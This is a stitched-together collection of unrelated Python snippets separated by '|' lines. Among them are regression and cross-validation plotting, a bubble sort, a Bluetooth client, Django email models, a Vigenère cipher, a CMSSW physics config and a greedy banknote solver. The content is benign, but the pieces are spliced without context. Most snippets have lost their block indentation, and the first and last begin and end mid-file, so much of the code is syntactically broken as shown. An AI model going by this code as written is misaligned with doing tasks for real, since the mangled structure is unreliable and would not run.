alpha=1/C
linlasso = Lasso(alpha=alpha,max_iter=9999).fit(x_poly, y)
print('when C is {0},intercept is {1},coef is{2},the score is {3:.4f}\n'.format(C,
linlasso.intercept_, linlasso.coef_,
linlasso.score(x_poly, y)))
y_pre_test = linlasso.predict(x_poly_test)
y_pre_test = y_pre_test.reshape(1,-1)
ax = fig2.add_subplot(2,4,inx+1,projection='3d')
ax.scatter(Xtest[:,0], Xtest[:,1], y_pre_test, label="lasso regression", color='blue',s=1)
ax.plot_surface(Xtest[:,0], Xtest[:,1], y_pre_test)
ax.scatter(x1, x2, y, label="original data", color='red',s=1)
plt.title("C={0}".format(C))
ax.set_xlabel('x1')
ax.set_ylabel('x2')
ax.set_zlabel('y')
plt.legend(loc='upper right',fontsize=5)
#plt.show()
#d
fig3=plt.figure(figsize=(17,12))
for inx,C in enumerate([0.001,0.01,0.1,1,10,100,1000]):
alpha=1/(2*C)
rige = Ridge(alpha=alpha,max_iter=9999).fit(x_poly, y)
print('when C is {0},intercept is {1},coef is{2},the score is {3:.4f}\n'.format(C,
rige.intercept_,
rige.coef_,
rige.score(x_poly, y)))
y_pre_test = rige.predict(x_poly_test)
y_pre_test = y_pre_test.reshape(1,-1)
ax = fig3.add_subplot(2,4,inx+1,projection='3d')
ax.scatter(Xtest[:,0], Xtest[:,1], y_pre_test, label="ridge regression", color='blue',s=1)
ax.plot_surface(Xtest[:,0], Xtest[:,1], y_pre_test)
ax.scatter(x1, x2, y, label="original data", color='red',s=1)
plt.title("C={0}".format(C))
ax.set_xlabel('x1')
ax.set_ylabel('x2')
ax.set_zlabel('y')
plt.legend(loc='upper right',fontsize=5)
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
# First I define 4 arrays to store the mean, standard deviation, variance
# and the list of K values, respectively.
mean_kfold_mse = []
standard_deviation_kfold_mse = []
variance_kfold_mse=[]
kfold1=[2,3,4,5,6,7,8,9,10,25,50,100]
mean_score_kfold=[]
linlasso1 = Lasso(alpha=1, max_iter=9999).fit(x_poly, y)
for i in kfold1:
mean_score_kfold.append(cross_val_score(linlasso1,x_poly,y,cv=i).mean())
kfold=[2,5,10,25,50,100]
# For each number of folds K, collect the MSE of every split, and after all
# splits compute the variance, mean and standard deviation of that K-fold's MSEs.
for inx,n_splits in enumerate(kfold):
kf = KFold(n_splits=n_splits)
mse = []
for train, test in kf.split(x_poly):
linlasso = Lasso(alpha=1, max_iter=9999).fit(x_poly[train], y[train])
ypred = linlasso.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
print('{0} of folds,the mean of the mse:{1}, the var of the mse:{2}'.format(n_splits, np.mean(mse), np.var(mse)))
variance_kfold_mse.append(np.var(mse))
mean_kfold_mse.append(np.mean(mse))
standard_deviation_kfold_mse.append(np.std(mse))
#Then I create a new figure object to draw using plot and errorbar function for each subplot .
fig4=plt.figure(figsize=(17,12))
plt.subplot(131)
plt.plot(kfold, mean_kfold_mse,label='MSE',color='red')
plt.plot(kfold, variance_kfold_mse,label='variance',color='blue')
plt.title('Mean square error and variance')
plt.xlabel('K')
plt.legend(loc='upper right',fontsize=5)
plt.subplot(132)
plt.errorbar(kfold, mean_kfold_mse,label='MSE',color='red',yerr=standard_deviation_kfold_mse)
plt.title('Mean square error')
plt.xlabel('K')
plt.legend(loc='upper right',fontsize=5)
#plot the mean scores of each K
plt.subplot(133)
plt.plot(kfold1,mean_score_kfold,label='mean scores',color='red')
plt.xlabel('K')
plt.title('the scores of different K')
plt.legend(loc='upper right',fontsize=5)
fig5 = plt.figure(figsize=(17,12))
c_range=[0.01,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1,1.2,1.5,1.8,2]
c_mean_mse1 = []
c_std_mse1 = []
c_mean_mse2 = []
c_std_mse2 = []
#when K=5
for inx, C in enumerate(c_range):
kf = KFold(n_splits=5)
mse = []
for train, test in kf.split(x_poly):
linlasso = Lasso(alpha=1 / C, max_iter=9999).fit(x_poly[train], y[train])
ypred = linlasso.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
c_mean_mse1.append(np.mean(mse))
c_std_mse1.append(np.std(mse))
#when K=10
for inx, C in enumerate(c_range):
kf = KFold(n_splits=10)
mse = []
for train, test in kf.split(x_poly):
linlasso = Lasso(alpha=1 / C, max_iter=9999).fit(x_poly[train], y[train])
ypred = linlasso.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
c_mean_mse2.append(np.mean(mse))
c_std_mse2.append(np.std(mse))
plt.errorbar(c_range, c_mean_mse2, label='K=10', color='blue', yerr=c_std_mse2)
plt.errorbar(c_range, c_mean_mse1, label='K=5', color='red', yerr=c_std_mse1)
plt.ylabel('Mean square error')
plt.xlabel('C')
plt.legend(loc='upper right',fontsize=5)
#(ii)(d)
#ridge model
#when K=5
fig6=plt.figure(figsize=(17,12))
c_range1=[0.001,0.01,0.1,1,10,100,1000]
c_mean_mse3 = []
c_std_mse3 = []
c_mean_mse4 = []
c_std_mse4 = []
for inx, C in enumerate(c_range1):
kf = KFold(n_splits=5)
mse = []
for train, test in kf.split(x_poly):
ridge = Ridge(alpha=1 / (2*C), max_iter=9999).fit(x_poly[train], y[train])
        ypred = ridge.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
c_mean_mse3.append(np.mean(mse))
c_std_mse3.append(np.std(mse))
#when K=10
for inx, C in enumerate(c_range1):
kf = KFold(n_splits=10)
mse = []
for train, test in kf.split(x_poly):
ridge = Ridge(alpha=1 / (2*C), max_iter=9999).fit(x_poly[train], y[train])
        ypred = ridge.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
c_mean_mse4.append(np.mean(mse))
c_std_mse4.append(np.std(mse))
#draw the MSE with different C and K
plt.errorbar(c_range1, c_mean_mse4, label='K=10', color='blue', yerr=c_std_mse4)
plt.errorbar(c_range1, c_mean_mse3, label='K=5', color='red', yerr=c_std_mse3)
plt.ylabel('Mean square error')
plt.title('ridge regression model')
plt.xlabel('C')
plt.legend(loc='upper right',fontsize=5)
#draw the mean scores of different C using ridge model
fig7=plt.figure(figsize=(17,12))
mean_score_crange=[]
crange_ridge = [0.01,0.1,0.3,0.5,0.7,1,2,4,6,10]
for c in crange_ridge:
ridge = Ridge(alpha=1/(2*c), max_iter=9999).fit(x_poly, y)
mean_score_crange.append(cross_val_score(ridge, x_poly, y, cv=5).mean())
plt.plot(crange_ridge,mean_score_crange,label='mean scores',color='red')
plt.xlabel('C')
plt.title('the scores of different C')
plt.legend(loc='upper right',fontsize=5)
plt.show()
|
"""
Сложность:
1. Худший случай: O(n^2) - когда нужно расставить элементы по возрастанию,
а они расположены по убыванию. O(n^2) даёт итерация по 2 циклам: внешний
цикл (сложность которого равна O(n)) мы умножаем на внутренний (он тоже
равен O(n)). O(n * n) = O(n^2)
2. Лучший случай: O(n) - когда все элементы расположены по возрастанию.
Сложность получается из-за того, что имеется переменная swapped,
которая позволяет прервать алгоритм, если не было осуществлено ни одной
перестановки за цикл, соответвенно для внутреннего цикла будет O(1), т.к.
проходимся только один раз, и после swapped=False выходим. Итого:
O(n) * O(1) = O(n)
3. Средний случай: O(n^2).
"""
def bubble_sort(collection):
"""
Реализация пузырьковой сортировки.
:param collection: любая изменяемая коллекция с гетерогенными элементами,
которые можно сравнивать.
:return: коллекция с элементами, расположенными по возрастанию.
Examples:
>>> bubble_sort([0, 5, 3, 2, 2])
[0, 2, 2, 3, 5]
>>> bubble_sort([])
[]
>>> bubble_sort([-2, -5, -45])
[-45, -5, -2]
>>> bubble_sort([-23, 0, 6, -4, 34])
[-23, -4, 0, 6, 34]
>>> bubble_sort([-23, 0, 6, -4, 34]) == sorted([-23, 0, 6, -4, 34])
True
"""
length = len(collection)
# Сортировка предпологает прохождение по всей коллекции. Внешний цикл
# занимается как раз итерацией через все элементы. i - это счётчик
# элементов, которые уже были отсортированы, потому что внутренний цикл
# за одну проходку сравнивает все соседние числа. Соответственно на
# каждой итерации будет появляться 1 отсортированный элемент. Он будет
# перемещён в конец, так как мы сортируем по возрастанию.
for i in range(length - 1):
# Данная переменная нужна в качестве флага, который показывает,
# была ли выполнена на текущем цикле "полезная работа" в виде
# перестановок элементов или нет. Если перестановки были, значит
# можно продолжать сортировать, так как ещё остались неотсортиро-
# ванные элементы,
swapped = False
# Внутренний цикл занимается перестановкой элементов. Выражение
# length - 1 - i вычитает i из length, чтобы ограничить итерацию
# только на НЕотсортированных элементах. Ведь отсортированные эле-
# менты не будут больше переставляться! Соответственно в конце
# коллекции будет набор элементов, зафиксированных в своём положении.
for j in range(length - 1 - i):
# Если текущий элемент больше следующего за ним...
if collection[j] > collection[j + 1]:
# Перестановка имеется, соответственно текущей цикл не
# будет последним, будем сортировать дальше.
swapped = True
# ... То поменять их местами. БОльшее число сместится ближе к концу.
collection[j], collection[j + 1] = collection[j + 1], collection[j]
# Если swapped за текущий цикл перестановок так и не поменяла своё
# значение на True, то значит мы проитерировались по отсортированным
# элементам, соответственно сортировать больше нечего. Конец сортировки.
if not swapped:
break # Прикратить итерацию, если коллекция отсортирована
return collection
if __name__ == "__main__":
user_input = input("Enter numbers separated by a comma:").strip()
unsorted = [int(item) for item in user_input.split(",")]
print(*bubble_sort(unsorted), sep=",")
|
"""
Dox Markdown publishing for ACE.
"""
__help__ = """
Dox is a markdown oriented command line publishing tool for ACE.
After installation, dox requires the following initialization:
ace dox init --content-type=<content-type> --body-field=<body-field> --key-field=<key-field>
This will write the environment in local directory. The content type is the ACE content type
to use for uploaded documents. The body field specifies which field of the content type
should be used for the contents of the body of the documents, and the key field specifies
the unique field by which existing content items can be identified.
Dox also requires a valid project set with the 'ace project set' command, or with the '--project'
flag.
"""
def seed_parser(parser):
"""
Seeds the arg parser.
"""
parser.add_argument('--content-type',dest='content_type',default=None)
parser.add_argument('--body-field',dest='body_field',default=None)
parser.add_argument('--key-field',dest='key_field',default=None)
parser.add_argument('--no-search-index',dest='search_index',action='store_const',const=False,default=True)
parser.add_argument('--no-reset-workflow',dest='reset_workflow',action='store_const',const=False,default=True)
def seed_commands(commands):
"""
Seeds the commands.
"""
from ace.plugins.dox import commands as cmd_functions
dox_commands = {
'init':cmd_functions.init,
'up':cmd_functions.upload,
'upload':cmd_functions.upload,
'keyfields':cmd_functions.keyfields,
'clean':cmd_functions.clean
}
commands['dox'] = dox_commands
|
import sys
import bluetooth
uuid = "1e0ca4ea-299d-4335-93eb-27fcfe7fa848"
service_matches = bluetooth.find_service(name="aaa", uuid=uuid)
if len(service_matches) == 0:
print "couldn't find the aaa Service"
sys.exit(0)
first_match = service_matches[0]
port = first_match["port"]
name = first_match["name"]
host = first_match["host"]
print "connecting to \"%s\" on %s" % (name, host)
print "host application port number is : %s " % port
sock=bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((host, port))
sock.send("hello!")
sock.close()
|
from django.db import models
class Blacklist(models.Model):
TYPE_CHOICES = (
(0, 'Bounce'),
(1, 'Complaints'),
)
email = models.EmailField(unique=True)
type = models.PositiveSmallIntegerField(default=0, choices=TYPE_CHOICES)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.email
RESULT_CODES = (
("1", "success"),
("2", "retry"),
("3", "blacklisted"),
)
class MessageLogManager(models.Manager):
def log(self, message, result_code):
subject = message.subject[:250] + '...' if len(message.subject) > 255 else message.subject
self.create(email=message.to[0], subject=subject, result=result_code)
class MessageLog(models.Model):
email = models.EmailField()
subject = models.CharField(max_length=255)
result = models.CharField(max_length=1, choices=RESULT_CODES)
created_at = models.DateTimeField(auto_now_add=True)
objects = MessageLogManager()
def __unicode__(self):
return self.email
|
from __future__ import absolute_import, unicode_literals
from common_services.clients.base import CommonServicesBaseClient
from common_services.models.email import RenderedEmail
class EmailClient(CommonServicesBaseClient):
VERSION = 'v1'
def __init__(self):
# type: () -> None
super(EmailClient, self).__init__()
self.EMAIL_URL = '/{}/email'.format(self.VERSION)
def send(self, recipient, subject_template_path, body_template_path, context, sender_email='ETS', modifier=None,
email_type='default', raise_exc=False):
# type: (str, str, str, dict, str, str, str, bool) -> None
url = '{}/send'.format(self.EMAIL_URL)
resp = self._make_post_request(url, data={
'senderEmail': sender_email,
'recipient': recipient,
'subjectTemplatePath': subject_template_path,
'bodyTemplatePath': body_template_path,
'modifier': modifier,
'context': context,
'emailType': email_type
})
self._handle_service_response(resp, raise_exc=raise_exc)
def send_raw(self, recipient, subject, body, sender_email, content_type, email_type='default', raise_exc=False):
# type: (str, str, str, str, str, str, bool) -> None
url = '{}/send/raw'.format(self.EMAIL_URL)
resp = self._make_post_request(url, data={
'senderEmail': sender_email,
'recipient': recipient,
'subject': subject,
'body': body,
'contentType': content_type,
'emailType': email_type
})
self._handle_service_response(resp, raise_exc=raise_exc)
def render(self, subject_template_path, body_template_path, context, modifier=None, raise_exc=False):
# type: (unicode, unicode, dict, unicode, bool) -> RenderedEmail
url = '{}/render'.format(self.EMAIL_URL)
resp = self._make_post_request(url, data={
'subjectTemplatePath': subject_template_path,
'bodyTemplatePath': body_template_path,
'modifier': modifier,
'context': context,
})
# Raise exception if response is not valid
self._handle_service_response(resp, raise_exc=raise_exc)
# Parse valid response
if resp.status_code in self.SUCCESS_STATUS_CODE_RANGE:
resp = resp.json()
return RenderedEmail(subject=resp.get('subject'), body=resp.get('body'))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : 2016-11-24 14:22:59
# @Author : Arms (526923945@qq.com)
# @Link : https://armszhou.github.io
# @Version : $Id$
import sys
Zero = [" *** ",
" * * ",
"* *",
"* *",
"* *",
" * * ",
" *** "]
One = [" * ", "** ", " * ", " * ", " * ", " * ", "***"]
Two = [" *** ", "* *", "* * ", " * ", " * ", "* ", "*****"]
Three = [" *** ", "* *", " *", " ** ", " *", "* *", " *** "]
Four = [" * ", " ** ", " * * ", "* * ", "******", " * ",
" * "]
Five = ["*****", "* ", "* ", " *** ", " *", "* *", " *** "]
Six = [" *** ", "* ", "* ", "**** ", "* *", "* *", " *** "]
Seven = ["*****", " *", " * ", " * ", " * ", "* ", "* "]
Eight = [" *** ", "* *", "* *", " *** ", "* *", "* *", " *** "]
Nine = [" ****", "* *", "* *", " ****", " *", " *", " *"]
Digits = [Zero, One, Two, Three, Four, Five, Six, Seven, Eight, Nine]
try:
    # sys.argv[1] is the second command line token, i.e. the number to draw
    digits = sys.argv[1]
    row = 0
    while row < 7:  # each big digit is drawn with 7 rows of asterisks
        line = ""
        column = 0
        while column < len(digits):  # len(digits) is the length of the argument string
            number = int(digits[column])  # convert the character of the argument into an integer
            digit = Digits[number]  # look up the big-digit pattern
            # compare against '*' and replace it with the corresponding digit
            d = 0
            while d < len(digit[row]):
                c = digit[row][d]
                if c == '*':
                    line += str(number)
                else:
                    line += c
                d += 1
            line += " "  # spacing between digits; the finished row is printed below
            column += 1
        print(line)
        row += 1
except IndexError:
print("usage: bigdigits.py <number>")
except ValueError as err:
print(err, "in", digits)
|
test_case = int(input())
while test_case:
n, m = map(int, input().split())
print(min(2, n - 1) * m)
test_case -= 1
|
import random


class RandomizedCollection:
def __init__(self):
"""
Initialize your data structure here.
"""
self.ms = []
def insert(self, val: int) -> bool:
"""
Inserts a value to the collection. Returns true if the collection did not already contain the specified element.
"""
self.ms.append(val)
if self.ms.count(val)>1:
return False
return True
def remove(self, val: int) -> bool:
"""
Removes a value from the collection. Returns true if the collection contained the specified element.
"""
if val in self.ms:
self.ms.remove(val)
return True
return False
def getRandom(self) -> int:
"""
Get a random element from the collection.
"""
return self.ms[random.randint(0,len(self.ms)-1)]
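# Hedged usage sketch (a quick sanity check, not part of the original solution):
#
#   rc = RandomizedCollection()
#   rc.insert(1)    # True: 1 was not present
#   rc.insert(1)    # False: 1 was already present
#   rc.remove(1)    # True: one copy of 1 is removed
#   rc.getRandom()  # returns 1, the only remaining element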
|
# CD to DAPPER folder
from IPython import get_ipython
IP = get_ipython()
if IP.magic("pwd").endswith('tutorials'):
IP.magic("cd ..")
else:
assert IP.magic("pwd").endswith("DAPPER")
# Load DAPPER
from common import *
# Load answers
from tutorials.resources.answers import answers, show_answer
# Load widgets
from ipywidgets import *
####################################
# DA video
####################################
import io
import base64
from IPython.display import HTML
def envisat_video():
caption = """Illustration of DA for the ozone layer in 2002.
<br><br>
LEFT: Satellite data (i.e. all that is observed).
RIGHT: Simulation model with assimilated data.
<br><br>
    Could you have perceived the <a href='http://dx.doi.org/10.1175/JAS-3337.1'>splitting of the ozone hole</a> only from the satellite data?
<br><br>
Attribution: William A. Lahoz, DARC.
"""
video = io.open('./data/figs/anims/darc_envisat_analyses.mp4', 'r+b').read()
encoded = base64.b64encode(video)
vid = HTML(data='''
<figure style="width:580px;">
<video alt="{1}" controls style="width:550px;">
<source src="data:video/mp4;base64,{0}" type="video/mp4" />
</video>
<figcaption style="background-color:#d9e7ff;">{1}</figcaption>
</figure>
'''.format(encoded.decode('ascii'),caption))
return vid
####################################
# EnKF animation
####################################
# from matplotlib.image import imread
#
# # Hack to keep line-spacing constant with/out TeX
# LE = '\phantom{$\{x_n^f\}_{n=1}^N$}'
#
# txts = [chr(i+97) for i in range(9)]
# txts[0] = 'We consider a single cycle of the EnKF,'+\
# 'starting with the analysis state at time $(t-1)$.'+LE+'\n'+\
# 'The contours are "equipotential" curves of $\|x-\mu_{t-1}\|_{P_{t-1}}$.'+LE
# txts[1] = 'The ensemble $\{x_n^a\}_{n=1}^N$ is (assumed) sampled from this distribution.'+LE+'\n'+LE
# txts[2] = 'The ensemble is forecasted from time $(t-1)$ to $t$ '+\
# 'using the dynamical model $f$.'+LE+'\n'+\
# 'We now denote it using the superscript $f$.'+LE
# txts[3] = 'Now we consider the analysis at time t. The ensemble is used'+LE+'\n'+\
# 'to estimate $\mu^f_t$ and $P^f_t$, i.e. the new contour curves.'+LE
# txts[4] = 'The likelihood is taken into account...'+LE+'\n'+LE
# txts[5] = '...which implicitly yields this posterior.' +LE+'\n'+LE
# txts[6] = 'Explicitly, however,'+LE+'\n'+\
# 'we compute the Kalman gain, based on the ensemble estimates.'+LE
# txts[7] = 'The Kalman gain is then used to shift the ensemble such that it represents' +LE+'\n'+\
# 'the (implicit) posterior. The cycle can then begin again, now from $t$ to $t+1$.'+LE
#
# def crop(img):
# top = int( 0.05*img.shape[0])
# btm = int((1-0.08)*img.shape[0])
# lft = int( 0.01*img.shape[1])
# rgt = int((1-0.01)*img.shape[1])
# return img[top:btm,lft:rgt]
#
# def illust_EnKF(i):
# with sns.axes_style("white"):
# plt.figure(1,figsize=(10,12))
# axI = plt.subplot(111)
# axI.set_axis_off()
# axI.set_title(txts[i],loc='left',usetex=True,size=15)
# axI.imshow(crop(imread('./tutorials/resources/illust_EnKF/illust_EnKF_prez_'+str(i+8)+'.png')))
# # Extract text:
# #plt.savefig("images/txts_"+str(i+8)+'.png')
# #bash: for f in `ls txts_*.png`; do convert -crop 800x110+120+260 $f $f; done
#
# EnKF_animation = interactive(illust_EnKF,i=IntSlider(min=0, max=7,continuous_update=False))
wI = Image(
value=open("./tutorials/resources/illust_EnKF/illust_EnKF_prez_8.png", "rb").read(),
format='png',
width=600,
height=400,
)
wT = Image(
value=open("./tutorials/resources/illust_EnKF/txts_8.png", "rb").read(),
format='png',
width=600,
height=50,
)
def show_image(i=0):
img = "./tutorials/resources/illust_EnKF/illust_EnKF_prez_"+str(i+8)+".png"
txt = "./tutorials/resources/illust_EnKF/txts_"+str(i+8)+".png"
wI.value=open(img, "rb").read()
wT.value=open(txt, "rb").read()
wS = interactive(show_image,i=(0,7,1))
EnKF_animation = VBox([wS,wT,wI])
####################################
# Misc
####################################
def plot_ensemble(E):
E_with_NaNs = np.hstack([np.tile(E,(1,2)),np.nan*ones((len(E),1))]).ravel()
Heights = plt.ylim()[1]*0.5*np.tile(arange(3),(len(E),1)).ravel()
plt.plot(E_with_NaNs,Heights,'k',lw=0.5,alpha=0.4,label="ensemble")
def piece_wise_DA_step_lines(xf,xa=None):
if xa is None:
xa = xf
else:
assert len(xf)==len(xa)
# Assemble piece-wise lines for plotting purposes
pw_f = array([[xa[k ], xf[k+1], nan] for k in range(len(xf)-1)]).ravel()
pw_a = array([[xf[k+1], xa[k+1], nan] for k in range(len(xf)-1)]).ravel()
return pw_f, pw_a
|
#solve for x
def solve_equation(equation):
x, add, num1, equal, num2 = equation.split()
num1, num2 = int(num1), int(num2)
return "x =" + str(num2 - num1)
print(solve_equation("x + 4 = 9"))
|
import pytest
if __name__ == "__main__":
    pytest.main([__file__])
|
#coding:utf-8
def script(s, player=None):
from NaoQuest.objective import Objective
from NaoSensor.plant import Plant
import NaoCreator.SGBDDialogue.creer as bd
import NaoCreator.Tool.speech_move as sm
if not player:
print("Error in execution of post_script \"testobj1_post\": player is None")
return
if not s.completed:
p1 = bd.Creer(bd.Instruction, bd.DicoVide, 30)
p2 = bd.Creer(bd.Instruction, bd.DicoVide, 31)
p3 = bd.Creer(bd.Instruction, bd.DicoVide, 32)
p4 = bd.Creer(bd.Instruction, bd.DicoVide, 33)
sm.speech_and_move(p1.out() + p2.out() + p3.out() + p4.out())
s.completed = True
else:
s.wait_for = False
|
import time
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
class Ckeditor:
def __init__(self, driver: webdriver, wait: WebDriverWait):
self.browser = driver
self.wait = wait
    def post(self, css_selector: str, message: str = 'Enviado usando o Selenium'):
time.sleep(1)
iframe = self.browser.switch_to.active_element
self.browser.switch_to.frame(iframe)
ckeditor = self.browser.find_element_by_css_selector(
'[contenteditable="true"]')
ckeditor.clear()
ckeditor.send_keys(message)
self.browser.switch_to.parent_frame()
        self.browser.find_element_by_css_selector(css_selector).click()
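# Hedged usage sketch (the driver setup, timeout and selector below are placeholders):
#
#   driver = webdriver.Chrome()
#   wait = WebDriverWait(driver, 10)
#   editor = Ckeditor(driver, wait)
#   editor.post('button[type="submit"]', 'Hello from Selenium')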
|
alphalist = [letter for letter in 'abcdefghijklmnopqrstuvwxyz']
tonum = dict(zip(alphalist, range(0, 26)))
toalpha = dict(zip(range(0, 26), alphalist))
def encrypt(plaintext, key):
ciphertext = ''
cipherkey = ''
plaintext = ''.join(plaintext.lower().split())
for i in range(len(plaintext)):
cipherkey += key[i % len(key)]
ciphertext += toalpha[(tonum[plaintext[i]] + tonum[cipherkey[i]]) % 26]
return ciphertext
def decrypt(ciphertext, key):
plaintext = ''
cipherkey = ''
for i in range(len(ciphertext)):
cipherkey += key[i % len(key)]
plaintext += toalpha[(tonum[ciphertext[i]] - tonum[cipherkey[i]]) % 26]
return plaintext
def main():
plaintext = 'The quick brown fox jumped over the lazy dog'
cipherkey = 'helloworld'
ciphertext = encrypt(plaintext, cipherkey)
decipheredtext = decrypt(ciphertext, cipherkey)
print('plaintext: {}'.format(plaintext))
print('cipherkey: {}'.format(cipherkey))
print('ciphertext: {}'.format(ciphertext))
print('decipheredtext: {}'.format(decipheredtext))
if __name__ == '__main__':
main()
|
# Auto generated configuration file
# using:
# Revision: 1.381.2.13
# Source: /local/reps/CMSSW/CMSSW/Configuration/PyReleaseValidation/python/ConfigBuilder.py,v
# with command line options: data -s RAW2DIGI,L1Reco,RECO --eventcontent RECO --conditions auto:com10 -n 500 --no_exec --data --scenario pp --process RERECO
import FWCore.ParameterSet.Config as cms
process = cms.Process('RERECO')
#
process = cms.Process("HistoEnergy")
#
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('Configuration.StandardSequences.RawToDigi_Data_cff')
process.load('Configuration.StandardSequences.L1Reco_cff')
process.load('Configuration.StandardSequences.Reconstruction_Data_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(100)
)
# Input source
process.source = cms.Source("PoolSource",
secondaryFileNames = cms.untracked.vstring(),
fileNames = cms.untracked.vstring(
'root://eoscms//eos/cms/store/data/Run2012A/MinimumBias/RAW/v1/000/191/226/FA549004-0886-E111-AB6F-BCAEC518FF6E.root',
)
#process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(False)
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.381.2.13 $'),
annotation = cms.untracked.string('data nevts:500'),
name = cms.untracked.string('PyReleaseValidation')
)
#HLTStream
process.hltAlCaPhiSymStream = cms.EDFilter( "HLTEcalPhiSymFilter",
statusThreshold = cms.uint32( 3 ),
barrelDigiCollection = cms.InputTag('ecalDigis','ebDigis'),
endcapDigiCollection = cms.InputTag('ecalDigis','eeDigis'),
barrelUncalibHitCollection = cms.InputTag("ecalMultiFitUncalibRecHit","EcalUncalibRecHitsEB"),
endcapUncalibHitCollection = cms.InputTag("ecalMultiFitUncalibRecHit","EcalUncalibRecHitsEE"),
barrelHitCollection = cms.InputTag('ecalRecHit','EcalRecHitsEB'),
endcapHitCollection = cms.InputTag('ecalRecHit','EcalRecHitsEE'),
ampCutADC_barrel = cms.double( 4.5 ),
ampCutADC_endcap = cms.double( 7.0 ),
eCut_endcap_high = cms.double( 999999.0 ),
eCut_barrel = cms.double( 0.15 ),
eCut_barrel_high = cms.double( 999999.0 ),
eCut_endcap = cms.double( 0.75 ),
useRecoFlag = cms.bool( False ),
phiSymBarrelDigiCollection = cms.string( "phiSymEcalDigisEB" ),
phiSymEndcapDigiCollection = cms.string( "phiSymEcalDigisEE" ),
phiSymBarrelHitCollection = cms.string( "phiSymEcalRecHitsEB" ),
phiSymEndcapHitCollection = cms.string( "phiSymEcalRecHitsEE" )
)
# Output definition
process.RECOSIMoutput = cms.OutputModule("PoolOutputModule",
splitLevel = cms.untracked.int32(0),
eventAutoFlushCompressedSize = cms.untracked.int32(5242880),
outputCommands = process.RECOSIMEventContent.outputCommands,
fileName = cms.untracked.string('AlCaPhiSym_stream_RAW2DIGI_RECO.root'),
dataset = cms.untracked.PSet(
filterName = cms.untracked.string(''),
dataTier = cms.untracked.string('')
)
)
#
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
#process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:com10', '')
process.GlobalTag = GlobalTag(process.GlobalTag, 'GR_R_73_V0A::All', '')
# Path and EndPath definitions
process.raw2digi_step = cms.Path(process.RawToDigi)
process.L1Reco_step = cms.Path(process.L1Reco)
process.reconstruction_step = cms.Path(process.reconstruction*process.hltAlCaPhiSymStream)
#process.hltAlCaPhiSymStream_step = cms.Path(process.hltAlCaPhiSymStream)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.RECOSIMoutput_step = cms.EndPath(process.RECOSIMoutput)
process.RECOSIMoutput.outputCommands.append('keep *')
#process.RECOSIMoutput.outputCommands.append('keep phiSymEcalDigisEB_*_*_*')
#process.RECOSIMoutput.outputCommands.append('keep phiSymEcalDigisEE_*_*_*')
#process.RECOSIMoutput.outputCommands.append('keep phiSymEcalRecHitsEB_*_*_*')
#process.RECOSIMoutput.outputCommands.append('keep phiSymEcalRecHitsEE_*_*_*')
# Schedule definition
process.schedule = cms.Schedule(process.raw2digi_step,process.L1Reco_step,process.reconstruction_step,process.endjob_step,process.RECOSIMoutput_step)
|
print(id("a"))
x = "a"
print(id(x))
# Basically everything is assigned to a specific part of memory, which will
# differ from computer to computer, but print(id("")) will show the identity
# of that object in memory on the local machine.
|
if __name__ == '__main__':
print("Banknotes problem:\n")
banknotes_romania = [1, 5, 10, 50, 100, 200, 500]
print(banknotes_romania, '\n')
from random import randint
price = randint(5, 1000)
print(f"The price is: {price}\n")
from collections import OrderedDict
solution = OrderedDict()
total_sum = 0
done = False
for banknote in banknotes_romania[::-1]:
if total_sum + banknote == price:
solution[banknote] = solution.get(banknote, 0) + 1
break
while total_sum + banknote < price:
total_sum += banknote
solution[banknote] = solution.get(banknote, 0) + 1
if total_sum + banknote == price:
solution[banknote] = solution.get(banknote, 0) + 1
done = True
if done:
break
print(f"For completing the sum of {price} lei we needed:")
for banknote in solution:
print(f"- {solution[banknote]} banknote of {banknote} lei.")
|
import numpy as np
import matplotlib.pyplot as plt
class Bandit:
def __init__(self, true_mean):
self.true_mean = true_mean
self.mean = 0
self.counter = 0
    def pull_handle(self):
        # reward is a uniform random draw offset by this bandit's true mean
        return np.random.rand() + self.true_mean
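# Hedged usage sketch (not part of the original file): an epsilon-greedy loop over
# several bandits; the running mean is updated by hand since the class defines no
# update method, and the constants are arbitrary.
#
#   bandits = [Bandit(m) for m in (1.0, 2.0, 3.0)]
#   eps = 0.1
#   for _ in range(1000):
#       if np.random.rand() < eps:
#           chosen = np.random.choice(bandits)            # explore
#       else:
#           chosen = max(bandits, key=lambda b: b.mean)   # exploit
#       reward = chosen.pull_handle()
#       chosen.counter += 1
#       chosen.mean += (reward - chosen.mean) / chosen.counter  # incremental mean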
|
import array
import numpy as np
import matplotlib.pyplot as plt
import rootpy.ROOT as ROOT
from peaks import peaks
p=peaks("total.root")
speMean=[]
speSigma=[]
mpeSpeMean=[]
spe_mpeRatio=[]
mpeMean=[]
mpeSigma=[]
PE=[]
mean_sig2=[]
for sn in p.snDict['spe']:
meanS=p.fitDict["spe","mean",sn]
sigS=p.fitDict["spe","sigma",sn]
meanM=p.fitDict["mpe","mean",sn]
rat=meanM/meanS
